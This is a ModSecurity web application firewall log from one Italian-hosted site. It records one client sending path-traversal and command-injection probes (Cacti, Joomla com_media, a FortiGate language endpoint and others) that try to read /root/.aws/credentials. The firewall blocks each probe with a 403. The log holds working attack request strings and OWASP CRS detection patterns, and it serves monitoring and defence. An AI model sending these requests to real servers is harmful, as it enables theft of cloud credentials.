[Tue May 20 02:41:03.247099 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aCvPn9OGg9eDPf0DPM6HcwAAAAA"]
[Tue May 20 02:41:03.247179 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aCvPn9OGg9eDPf0DPM6HcwAAAAA"]
[Tue May 20 02:41:03.247217 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aCvPn9OGg9eDPf0DPM6HcwAAAAA"]
[Tue May 20 02:41:03.247831 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aCvPn9OGg9eDPf0DPM6HcwAAAAA"]
[Tue May 20 02:41:03.248023 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aCvPn9OGg9eDPf0DPM6HcwAAAAA"]
[Tue May 20 02:41:12.351837 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/cacti/cmd_realtime.php"] [unique_id "aCvPqNOGg9eDPf0DPM6HdwAAAAA"]
[Tue May 20 02:41:12.351910 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/cacti/cmd_realtime.php"] [unique_id "aCvPqNOGg9eDPf0DPM6HdwAAAAA"]
[Tue May 20 02:41:12.352042 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/cacti/cmd_realtime.php"] [unique_id "aCvPqNOGg9eDPf0DPM6HdwAAAAA"]
[Tue May 20 02:41:12.352083 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1 cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/cacti/cmd_realtime.php"] [unique_id "aCvPqNOGg9eDPf0DPM6HdwAAAAA"]
[Tue May 20 02:41:12.352221 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:l[\\\\\\\\'\\"]* ..." at ARGS:local_data_id. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "123"] [id "932100"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: ;cat ../../../../../../../root/.aws/credentials found within ARGS:local_data_id: 1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/cacti/cmd_realtime.php"] [unique_id "aCvPqNOGg9eDPf0DPM6HdwAAAAA"]
[Tue May 20 02:41:12.352819 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cacti/cmd_realtime.php"] [unique_id "aCvPqNOGg9eDPf0DPM6HdwAAAAA"]
[Tue May 20 02:41:12.352995 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cacti/cmd_realtime.php"] [unique_id "aCvPqNOGg9eDPf0DPM6HdwAAAAA"]
[Tue May 20 02:41:14.311515 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPqtOGg9eDPf0DPM6HeAAAAAA"]
[Tue May 20 02:41:14.311744 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPqtOGg9eDPf0DPM6HeAAAAAA"]
[Tue May 20 02:41:14.311928 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPqtOGg9eDPf0DPM6HeAAAAAA"]
[Tue May 20 02:41:15.630366 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPq9OGg9eDPf0DPM6HeQAAAAA"]
[Tue May 20 02:41:15.630434 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPq9OGg9eDPf0DPM6HeQAAAAA"]
[Tue May 20 02:41:15.630487 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=medialist&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPq9OGg9eDPf0DPM6HeQAAAAA"]
[Tue May 20 02:41:15.631693 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPq9OGg9eDPf0DPM6HeQAAAAA"]
[Tue May 20 02:41:15.631874 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPq9OGg9eDPf0DPM6HeQAAAAA"]
[Tue May 20 02:41:16.750132 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPrNOGg9eDPf0DPM6HegAAAAA"]
[Tue May 20 02:41:16.751088 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPrNOGg9eDPf0DPM6HegAAAAA"]
[Tue May 20 02:41:16.751129 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPrNOGg9eDPf0DPM6HegAAAAA"]
[Tue May 20 02:41:16.751629 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPrNOGg9eDPf0DPM6HegAAAAA"]
[Tue May 20 02:41:16.751835 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/index.php"] [unique_id "aCvPrNOGg9eDPf0DPM6HegAAAAA"]
[Tue May 20 02:41:22.381870 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/ajax_dashboard.php"] [unique_id "aCvPstOGg9eDPf0DPM6HfAAAAAA"]
[Tue May 20 02:41:22.381951 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/ajax_dashboard.php"] [unique_id "aCvPstOGg9eDPf0DPM6HfAAAAAA"]
[Tue May 20 02:41:22.381984 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/ajax_dashboard.php"] [unique_id "aCvPstOGg9eDPf0DPM6HfAAAAAA"]
[Tue May 20 02:41:22.382430 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/ajax_dashboard.php"] [unique_id "aCvPstOGg9eDPf0DPM6HfAAAAAA"]
[Tue May 20 02:41:22.382611 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/ajax_dashboard.php"] [unique_id "aCvPstOGg9eDPf0DPM6HfAAAAAA"]
[Tue May 20 02:41:23.574434 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/remote/fgt_lang"] [unique_id "aCvPs9OGg9eDPf0DPM6HfQAAAAA"]
[Tue May 20 02:41:23.574506 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/remote/fgt_lang"] [unique_id "aCvPs9OGg9eDPf0DPM6HfQAAAAA"]
